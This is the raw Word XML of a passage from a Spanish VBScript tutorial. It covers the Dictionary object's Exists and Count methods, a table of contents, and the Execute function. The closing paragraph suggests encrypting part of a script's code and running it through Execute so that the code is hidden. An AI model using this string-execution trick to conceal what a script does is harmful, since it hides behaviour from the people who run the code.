                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("respuesta</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>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True Then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2113"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Msg = "El valor de la clave es: "&amp;VarDic.Item("respuesta") Else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="462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Msg = "No existe ningun valor..." End If</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ejemplo si se ha escrito algo, se crea un valor para la clave respuesta con lo que haya escrito en el InputBox. Luego comprueba con el método </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Exists</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> si realmente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se ha creado o no la clave y su valor</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y le asigna a la variable VarMsg un valor diferente según ocurr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quinta y ultim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Count</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función devuelve un valor numérico que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>indica el número de claves que existen</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la colección. Es decir, simplemente nos indica cuantos valores hemos creado. Para utilizarla se coloca el nombre de la variable, un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>punto y</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Count</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Abajo tenéis un ejemplo de uso, en el que la variable VarNum obtiene el valor 3:</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Num = VarDic.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Coun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se suele usar para hacer alguna operación en todos los pares de la variable mediante un bucle For. Hasta aquí la explicación del </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>objeto Dictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, el uso que cada uno le de dependerá de su imaginación o sus necesidades. Este objeto, como se ha visto, va más encarado a la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ordenación de información</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que a alguna función en concreto, pero repito que es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>muy útil</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. En cuanto a los Objetos se refiere, esto es lo básico...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00E62AD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
          <w:headerReference w:type="even" r:id="rId48"/>
          <w:headerReference w:type="default" r:id="rId49"/>
          <w:footerReference w:type="even" r:id="rId50"/>
          <w:footerReference w:type="default" r:id="rId51"/>
          <w:headerReference w:type="first" r:id="rId52"/>
          <w:footerReference w:type="first" r:id="rId53"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1417" w:right="1689" w:bottom="1442" w:left="1628" w:header="708" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="279" w:right="20"/>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Uso Avanzado y Ejemplos de </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="610" w:line="270" w:lineRule="auto"/>
        <w:ind w:left="279" w:right="20"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Visual Basic Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="431" w:line="265"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cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PARTES DEL TUTORIAL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="44"/>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Usos Alternativos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="248" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="67" w:right="44" w:firstLine="0"/>
        <w:jc w:val="left"/>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Arrays y Matrices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="44"/>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Ejemplos y Códigos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="446" w:line="419" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="44"/>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Uso de las Referencias Programación en Visual Basic Script: Notas Finales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="295" w:line="265" w:lineRule="auto"/>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Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SOBRE  LOS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  TUTORIALES:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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Visual Basic Script es un lenguaje de programación mediante Scripts (no genera .exe al no ser compilado), de alto nivel. En general es uno de los lenguajes más básicos y es, sin duda alguna, la base del Visual Basic 6, ya que todo lo que se aprende aquí, luego puede ser usado en él sin ningún cambio. En otras palabras, es el lenguaje que se suele aprender antes del Visual Basic 6. Es por eso que todo programador de Visual Basic que se precie debe conocerlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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 xml:space="preserve">Con este motivo, para aquellos que se quieran iniciar en el mundo de la programación con un lenguaje sencillo de aprender, antes de estudiar en la universidad ya otros más avanzados, he decidido poner aquí un tutorial de aprendizaje de Visual Basic Script desde lo más básico hasta lo más avanzado, y posteriormente, como adaptar lo aprendido a Visual Basic 6, y un tutorial sobre </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>él. En definitiva, lo que yo llamo un proceso de aprendizaje desde lo más simple hasta el nivel que te permitirá realizar programas como los que yo ofrezco...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="8"/>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Introducción en Programación en Visual Basic Script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="8"/>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 xml:space="preserve">Programación con Objetos (ActiveX, “.ocx”) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="237" w:line="259" w:lineRule="auto"/>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b/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Uso avanzado y Ejemplos de VBScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="819"/>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 xml:space="preserve">De estos tres simples, pero </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>largos documentos está</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> compuesto el tutorial de Visual Basic Script. Deberás aprender por orden cada uno de ellos para continuar con el siguiente, pero no te apures, no es difícil.</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lo olvides, para dudas o consultas escribe a: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scswinter@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="140" w:line="259"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dudes en visitar: </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.110mb.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="4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Programación en Visual Basic Script:  Usos Alternativos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ara tener un uso avanzado de Visual Basic Script sería necesario cumplir los siguientes puntos, expuestos en la lista que hay a continuación, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por el contrario, prefieres usar estos tutoriales como introducción para aprender Visual Basic, bastará que realices las tres primeras únicamente (y la última, que nunca viene mal):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conocer diversas funciones y usos alternativos posibles con ejemplos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conocer la forma de trabajar con referencias del lenguaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Repasar con las referencias todo lo visto hasta ahora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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prender con las referencias nuevas estructuras y funciones análogas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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prender mediante las referencias otros objetos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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t>Practicar, practicar y practicar mucho…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="302"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Como podéis comprobar, tan solo los dos primeros pueden ser (y de echo serán) explicados aquí, mediante un tutorial. Pero es conveniente que una vez alcanzado este nivel, dejéis estaros de tutoriales y aprendáis a manejar referencias que son lo que de verdad te enseñará de forma objetiva. Pero no os preocupéis si no sabéis como, pues será explicado aquí tras el primer punto… Así que dejémonos de introducciones, voy a explicar un poco más sobre funciones y usos de Visual Basic Script a continuación.</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cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5398770" cy="5080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="124872" name="Group 124872"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5398770" cy="5080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5398770" cy="5080"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="134318" name="Shape 134318"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5398770" cy="9144"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5398770" h="9144">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5398770" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5398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872" style="width:425.1pt;height:0.399994pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="53987,50">
                <v:shape id="Shape 134319" style="position:absolute;width:53987;height:91;left:0;top:0;" coordsize="5398770,9144" path="m0,0l5398770,0l5398770,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Lo primero, es dar a conocer una función un tanto peculiar: La función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Execute</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Execute</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una función que ejecuta un trozo de código de una forma especial. Me explico: Esta función ejecuta una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">función que le indicamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de la siguiente forma: Supongamos que tenemos el siguiente script, que hace operaciones con variabl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5</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Variable+5</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Variable*6</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Variable es el nombre de la variable que operamos. Primero le asignamos el valor 5, luego le sumamos cinco mas, obteniendo un total de 10. Por ultimo lo multiplicamos por diez, obteniendo un total de 60. Bien, la función execute ejecutaría un valor de cadena como si fuera una función.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el código de arriba con la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función execute</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> quedaría así:</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5</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xecute </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Variable = Variable+5</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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xecute </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Variable = Variable*6</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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reo que queda claro el uso de esta función. Y esto, aunque no lo parezca tiene muchos usos,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si tienes el código muy largo y pones la mitad en un archivo y la mitad en otro, al final del primer archivo puedes poner que lea el segundo, y que lo guarde como una cadena, y luego</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> usas esta función para ejecutarlo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Otro uso es con la función de encriptación que os he puesto antes puedes encriptar una parte del código y luego colocarlo como una cadena. Luego usas esta función seguida de la de desencriptar y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>así lo ejecutas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Es </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>decir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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escondes parte del código</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
